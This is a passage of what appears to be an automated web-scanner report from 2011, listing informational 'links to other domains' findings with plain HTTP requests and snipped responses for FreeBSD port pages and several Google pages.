...[SNIP]...

20.661. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/yydecode/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://yydecode.sf.net/

Request

GET /cgi/url.cgi?ports/news/yydecode/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:45 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ecode's
functionality, (ie. decodes standard uuencoded files, as well as Base64
[RFC2045] encoded files produced by uuencode) and hence can be used as a
drop-in replacement in all circumstances.

WWW: <A HREF="http://yydecode.sf.net/">http://yydecode.sf.net/</A>
...[SNIP]...

20.662. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/ubh/pkg-descr

The response contains the following links to other domains:

http://ubh.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/ubh/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:42 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
, Active Perl
on Win32 platforms, and Mac OS X. Requires Net::NNTP and
News::Newsrc
(which itself requires Set::IntSpan), MIME::Parser, MIME::Base64,
IO::Stringy, and MailTools (distribution).

WWW: <A HREF="http://ubh.sourceforge.net/">http://ubh.sourceforge.net/</A>
...[SNIP]...

20.663. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/pan/pkg-descr

The response contains the following links to other domains:

http://pan.rebelbase.com/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/pan/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
vanced users alike. It has all the typical
features found in newsreaders, and also supports offline reading, multiple
connections, and a number of features for power users and alt.binaries fans.

WWW: <A HREF="http://pan.rebelbase.com/">http://pan.rebelbase.com/</A>
...[SNIP]...

20.664. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/golded+/pkg-descr

The response contains the following links to other domains:

http://golded-plus.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/golded+/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
GoldED+ (FTN message editor)

GoldED+ is a succesor of the well-known GoldED Fidonet Mail Reader.

WWW: <A HREF="http://golded-plus.sourceforge.net/">http://golded-plus.sourceforge.net/</A>
...[SNIP]...

20.665. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we

The response contains the following links to other domains:

http://annualreports.com/partners/Report/21590
http://daytradingstockblog.blogspot.com/2011/01/mid-caps-nvda-fslr-lulu-akam-slw.html
http://finance.yahoo.com/q/rr?s=GES
http://google.brand.edgar-online.com/?sym=GES
http://googlefinanceblog.blogspot.com/
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0
http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec
http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES
http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES
http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5
http://topstockspick.blogspot.com/2011/01/analyst-recommendation-strong-buy-rated_3972.html
http://web.servicebureau.net/conf/meta?i=1113214965&c=2343&m=was&u=/w_ccbn.xsl&date_ticker=GES
http://www.dailyfinance.com/event/GES/usa
http://www.google.ca/finance
http://www.guess.com/worldofguess/
http://www.guess.eu/
http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst
http://www.nasd100.com/2011/01/top-large-cap-stocks-with-highest-upside-potential-jan-24-2011.html
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374
http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372
http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1

Request

GET /finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 24 Jan 2011 16:39:59 GMT
Expires: Mon, 24 Jan 2011 16:39:59 GMT
Cache-Control: private, max-age=0
Set-Cookie: SC=RV=659099:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Guess?, Inc.: NYSE:GES quotes & news - Google Finance</title>
<meta name="Description" c
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div>Q3 2011 Earnings Conference Call -
<a onclick="_GF_click('', 'webcast', 'GES', '')" href="http://web.servicebureau.net/conf/meta?i=1113214965&c=2343&m=was&u=/w_ccbn.xsl&date_ticker=GES" class=time>
<img alt="Webcast" src="/finance/s/m4C5KaofCbA/images/cleardot.gif"
width=19 height=16 class=SP_webcast id=webcast>
...[SNIP]...
<td>
<a href="http://www.dailyfinance.com/event/GES/usa" >
More events from DailyFinance »</a>
...[SNIP]...
<br>
<a id=fs-chome href="http://www.guess.eu/" >
http://www.guess.eu/
</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0" >News Releases</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome" >Investor Relations</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec" >Financial Information</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard" >Executives</a>
...[SNIP]...
<div class=item><a id=fs- href="http://www.guess.com/worldofguess/" >Products/Services</a>
...[SNIP]...
<div class=item><a id=m-analyst
href=http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst >Analyst Estimates</a>
...[SNIP]...
<div class=item><a id=m-sec
href=http://google.brand.edgar-online.com?sym=GES >SEC Filings</a>
...[SNIP]...
<div class=item><a id=m-hold
href=http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES >Major Holders</a>
...[SNIP]...
<div class=item><a id=m-research
href=http://finance.yahoo.com/q/rr?s=GES >Research Reports</a>
...[SNIP]...
<div class=item><a id=m-annualreport
href=http://annualreports.com/partners/Report/21590 >Annual Report (PDF)</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://www.nasd100.com/2011/01/top-large-cap-stocks-with-highest-upside-potential-jan-24-2011.html" rel="nofollow" >Top Large Cap Stocks with Highest Upside Potential (Jan 24, 2011 ...</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://daytradingstockblog.blogspot.com/2011/01/mid-caps-nvda-fslr-lulu-akam-slw.html" rel="nofollow" >Stock Market Analysis: Mid Caps ( NVDA, FSLR, LULU, AKAM, SLW )</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://topstockspick.blogspot.com/2011/01/analyst-recommendation-strong-buy-rated_3972.html" rel="nofollow" >Top Stocks Pick: Analyst Recommendation "Strong Buy" Rated Mid Cap ...</a>
...[SNIP]...
<div class=sfe-break-top>
<a id=m-rprofile href="http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES" >
More from Reuters »
</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372" >Bio & Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892" >Bio & Compensation</a>
...[SNIP]...
<div class=gb>
<a href="http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5" >
Full list on Reuters »</a>
...[SNIP]...
</a> -
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

20.666. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/finance?hl=en&tab=we

The response contains the following links to other domains:

http://googlefinanceblog.blogspot.com/
http://online.wsj.com/article/BT-CO-20110124-708741.html
http://www.bloomberg.com/news/2011-01-24/rocktenn-agrees-to-acquire-smurfit-stone-container-for-about-3-5-billion.html
http://www.csmonitor.com/USA/Politics/2011/0124/State-of-the-Union-The-crafting-of-a-speech
http://www.ft.com/cms/s/0/b783d400-27c8-11e0-a327-00144feab49a.html
http://www.google.ca/finance
http://www.ibtimes.com/articles/104262/20110124/us-stocks.htm
http://www.nytimes.com/2011/01/25/business/25markets.html?src=busln
http://www.youtube.com/?hl=en&tab=e1

Request

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Mon, 24 Jan 2011 16:39:58 GMT
Expires: Mon, 24 Jan 2011 16:39:58 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span class=name>
<a href="http://www.ibtimes.com/articles/104262/20110124/us-stocks.htm" rel=nofollow id=n-hp- >US stocks advance in early trade</a>
...[SNIP]...
<div>
<a class=title href="http://www.csmonitor.com/USA/Politics/2011/0124/State-of-the-Union-The-crafting-of-a-speech" rel=nofollow id=n-hp- >State of the Union: The crafting of a speech</a>
...[SNIP]...
<div>
<a class=title href="http://www.ft.com/cms/s/0/b783d400-27c8-11e0-a327-00144feab49a.html" rel=nofollow id=n-hp- >Ackman to join JC Penney board</a>
...[SNIP]...
<div>
<a class=title href="http://www.bloomberg.com/news/2011-01-24/rocktenn-agrees-to-acquire-smurfit-stone-container-for-about-3-5-billion.html" rel=nofollow id=n-hp- >Rock-Tenn to Acquire Smurfit-Stone for $3.5 Billion</a>
...[SNIP]...
<div>
<a class=title href="http://online.wsj.com/article/BT-CO-20110124-708741.html" rel=nofollow id=n-hp- >S&P Says More Downgrades Possible In 2011 Muni Bond Markets</a>
...[SNIP]...
<div>
<a class=title href="http://www.nytimes.com/2011/01/25/business/25markets.html?src=busln" rel=nofollow id=n-hp- >Wall Street Steady as Traders Take In More Earnings</a>
...[SNIP]...
</a> -
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

20.667. http://www.google.com/imghp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/imghp

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/imghp?hl=en&tab=wi

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&tab=i1

Request

GET /imghp?hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Google Images. The most comprehensive image search on the web."><title>G
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=i1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.668. http://www.google.com/language_tools previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/language_tools

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/language_tools?hl=en

The response contains the following links to other domains:

http://www.google.ad/
http://www.google.ae/
http://www.google.am/
http://www.google.as/
http://www.google.at/
http://www.google.az/
http://www.google.ba/
http://www.google.be/
http://www.google.bf/
http://www.google.bg/
http://www.google.bi/
http://www.google.bj/
http://www.google.bs/
http://www.google.by/
http://www.google.ca/
http://www.google.cd/
http://www.google.cf/
http://www.google.cg/
http://www.google.ch/
http://www.google.ci/
http://www.google.cl/
http://www.google.cm/
http://www.google.cn/
http://www.google.cz/
http://www.google.de/
http://www.google.dj/
http://www.google.dk/
http://www.google.dm/
http://www.google.dz/
http://www.google.ee/
http://www.google.es/
http://www.google.fi/
http://www.google.fm/
http://www.google.fr/
http://www.google.ga/
http://www.google.ge/
http://www.google.gg/
http://www.google.gl/
http://www.google.gm/
http://www.google.gp/
http://www.google.gr/
http://www.google.gy/
http://www.google.hn/
http://www.google.hr/
http://www.google.ht/
http://www.google.hu/
http://www.google.ie/
http://www.google.im/
http://www.google.is/
http://www.google.it/
http://www.google.je/
http://www.google.jo/
http://www.google.kg/
http://www.google.ki/
http://www.google.kz/
http://www.google.la/
http://www.google.li/
http://www.google.lk/
http://www.google.lt/
http://www.google.lu/
http://www.google.lv/
http://www.google.md/
http://www.google.me/
http://www.google.mg/
http://www.google.mk/
http://www.google.ml/
http://www.google.mn/
http://www.google.ms/
http://www.google.mu/
http://www.google.mv/
http://www.google.mw/
http://www.google.ne/
http://www.google.nl/
http://www.google.no/
http://www.google.nr/
http://www.google.nu/
http://www.google.pl/
http://www.google.pn/
http://www.google.ps/
http://www.google.pt/
http://www.google.ro/
http://www.google.rs/
http://www.google.ru/
http://www.google.rw/
http://www.google.sc/
http://www.google.se/
http://www.google.sh/
http://www.google.si/
http://www.google.sk/
http://www.google.sm/
http://www.google.sn/
http://www.google.st/
http://www.google.td/
http://www.google.tg/
http://www.google.tk/
http://www.google.tl/
http://www.google.tm/
http://www.google.to/
http://www.google.tt/
http://www.google.vg/
http://www.google.vu/
http://www.google.ws/
http://www.youtube.com/?hl=en&tab=w1

Request

GET /language_tools?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:39:50 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><title>Language Tools</title><meta http-equiv="content-type" content="text/html;charset=UTF-8"><style>@import url(http://www.google.com/css/modules/g-flag.css);ol.g-flag {display: block;ov
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<li><a href="http://www.google.ad"><span class="ad">
...[SNIP]...
<li><a href="http://www.google.ae"><span class="ae">
...[SNIP]...
<li><a href="http://www.google.am"><span class="am">
...[SNIP]...
<li><a href="http://www.google.as"><span class="as">
...[SNIP]...
<li><a href="http://www.google.at"><span class="at">
...[SNIP]...
<li><a href="http://www.google.az"><span class="az">
...[SNIP]...
<li><a href="http://www.google.ba"><span class="ba">
...[SNIP]...
<li><a href="http://www.google.be"><span class="be">
...[SNIP]...
<li><a href="http://www.google.bf"><span class="bf">
...[SNIP]...
<li><a href="http://www.google.bg"><span class="bg">
...[SNIP]...
<li><a href="http://www.google.bi"><span class="bi">
...[SNIP]...
<li><a href="http://www.google.bj"><span class="bj">
...[SNIP]...
<li><a href="http://www.google.bs"><span class="bs">
...[SNIP]...
<li><a href="http://www.google.by"><span class="by">
...[SNIP]...
<li><a href="http://www.google.ca"><span class="ca">
...[SNIP]...
<li><a href="http://www.google.cd"><span class="cd">
...[SNIP]...
<li><a href="http://www.google.cf"><span class="cf">
...[SNIP]...
<li><a href="http://www.google.cg"><span class="cg">
...[SNIP]...
<li><a href="http://www.google.ch"><span class="ch">
...[SNIP]...
<li><a href="http://www.google.ci"><span class="ci">
...[SNIP]...
<li><a href="http://www.google.cl"><span class="cl">
...[SNIP]...
<li><a href="http://www.google.cm"><span class="cm">
...[SNIP]...
<li><a href="http://www.google.cn"><span class="cn">
...[SNIP]...
<li><a href="http://www.google.cz"><span class="cz">
...[SNIP]...
<li><a href="http://www.google.de"><span class="de">
...[SNIP]...
<li><a href="http://www.google.dj"><span class="dj">
...[SNIP]...
<li><a href="http://www.google.dk"><span class="dk">
...[SNIP]...
<li><a href="http://www.google.dm"><span class="dm">
...[SNIP]...
<li><a href="http://www.google.dz"><span class="dz">
...[SNIP]...
<li><a href="http://www.google.ee"><span class="ee">
...[SNIP]...
<li><a href="http://www.google.es"><span class="es">
...[SNIP]...
<li><a href="http://www.google.fi"><span class="fi">
...[SNIP]...
<li><a href="http://www.google.fm"><span class="fm">
...[SNIP]...
<li><a href="http://www.google.fr"><span class="fr">
...[SNIP]...
<li><a href="http://www.google.ga"><span class="ga">
...[SNIP]...
<li><a href="http://www.google.ge"><span class="ge">
...[SNIP]...
<li><a href="http://www.google.gg"><span class="gg">
...[SNIP]...
<li><a href="http://www.google.gl"><span class="gl">
...[SNIP]...
<li><a href="http://www.google.gm"><span class="gm">
...[SNIP]...
<li><a href="http://www.google.gp"><span class="gp">
...[SNIP]...
<li><a href="http://www.google.gr"><span class="gr">
...[SNIP]...
<li><a href="http://www.google.gy"><span class="gy">
...[SNIP]...
<li><a href="http://www.google.hn"><span class="hn">
...[SNIP]...
<li><a href="http://www.google.hr"><span class="hr">
...[SNIP]...
<li><a href="http://www.google.ht"><span class="ht">
...[SNIP]...
<li><a href="http://www.google.hu"><span class="hu">
...[SNIP]...
<li><a href="http://www.google.ie"><span class="ie">
...[SNIP]...
<li><a href="http://www.google.im"><span class="im">
...[SNIP]...
<li><a href="http://www.google.is"><span class="is">
...[SNIP]...
<li><a href="http://www.google.it"><span class="it">
...[SNIP]...
<li><a href="http://www.google.je"><span class="je">
...[SNIP]...
<li><a href="http://www.google.jo"><span class="jo">
...[SNIP]...
<li><a href="http://www.google.ki"><span class="ki">
...[SNIP]...
<li><a href="http://www.google.kg"><span class="kg">
...[SNIP]...
<li><a href="http://www.google.kz"><span class="kz">
...[SNIP]...
<li><a href="http://www.google.la"><span class="la">
...[SNIP]...
<li><a href="http://www.google.li"><span class="li">
...[SNIP]...
<li><a href="http://www.google.lk"><span class="lk">
...[SNIP]...
<li><a href="http://www.google.lt"><span class="lt">
...[SNIP]...
<li><a href="http://www.google.lu"><span class="lu">
...[SNIP]...
<li><a href="http://www.google.lv"><span class="lv">
...[SNIP]...
<li><a href="http://www.google.md"><span class="md">
...[SNIP]...
<li><a href="http://www.google.me"><span class="me">
...[SNIP]...
<li><a href="http://www.google.mg"><span class="mg">
...[SNIP]...
<li><a href="http://www.google.mk"><span class="mk">
...[SNIP]...
<li><a href="http://www.google.ml"><span class="ml">
...[SNIP]...
<li><a href="http://www.google.mn"><span class="mn">
...[SNIP]...
<li><a href="http://www.google.ms"><span class="ms">
...[SNIP]...
<li><a href="http://www.google.mu"><span class="mu">
...[SNIP]...
<li><a href="http://www.google.mv"><span class="mv">
...[SNIP]...
<li><a href="http://www.google.mw"><span class="mw">
...[SNIP]...
<li><a href="http://www.google.ne"><span class="ne">
...[SNIP]...
<li><a href="http://www.google.nl"><span class="nl">
...[SNIP]...
<li><a href="http://www.google.no"><span class="no">
...[SNIP]...
<li><a href="http://www.google.nr"><span class="nr">
...[SNIP]...
<li><a href="http://www.google.nu"><span class="nu">
...[SNIP]...
<li><a href="http://www.google.pl"><span class="pl">
...[SNIP]...
<li><a href="http://www.google.pn"><span class="pn">
...[SNIP]...
<li><a href="http://www.google.ps"><span class="ps">
...[SNIP]...
<li><a href="http://www.google.pt"><span class="pt">
...[SNIP]...
<li><a href="http://www.google.ro"><span class="ro">
...[SNIP]...
<li><a href="http://www.google.ru"><span class="ru">
...[SNIP]...
<li><a href="http://www.google.rw"><span class="rw">
...[SNIP]...
<li><a href="http://www.google.sc"><span class="sc">
...[SNIP]...
<li><a href="http://www.google.se"><span class="se">
...[SNIP]...
<li><a href="http://www.google.sh"><span class="sh">
...[SNIP]...
<li><a href="http://www.google.si"><span class="si">
...[SNIP]...
<li><a href="http://www.google.sk"><span class="sk">
...[SNIP]...
<li><a href="http://www.google.sn"><span class="sn">
...[SNIP]...
<li><a href="http://www.google.sm"><span class="sm">
...[SNIP]...
<li><a href="http://www.google.st"><span class="st">
...[SNIP]...
<li><a href="http://www.google.td"><span class="td">
...[SNIP]...
<li><a href="http://www.google.tg"><span class="tg">
...[SNIP]...
<li><a href="http://www.google.tk"><span class="tk">
...[SNIP]...
<li><a href="http://www.google.tl"><span class="tl">
...[SNIP]...
<li><a href="http://www.google.tm"><span class="tm">
...[SNIP]...
<li><a href="http://www.google.to"><span class="to">
...[SNIP]...
<li><a href="http://www.google.tt"><span class="tt">
...[SNIP]...
<li><a href="http://www.google.vg"><span class="vg">
...[SNIP]...
<li><a href="http://www.google.vu"><span class="vu">
...[SNIP]...
<li><a href="http://www.google.ws"><span class="ws">
...[SNIP]...
<li><a href="http://www.google.rs"><span class="rs">
...[SNIP]...

20.669. http://www.google.com/prdhp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/prdhp

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/prdhp?hl=en&tab=wf

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&tab=f1

Request

GET /prdhp?hl=en&tab=wf HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
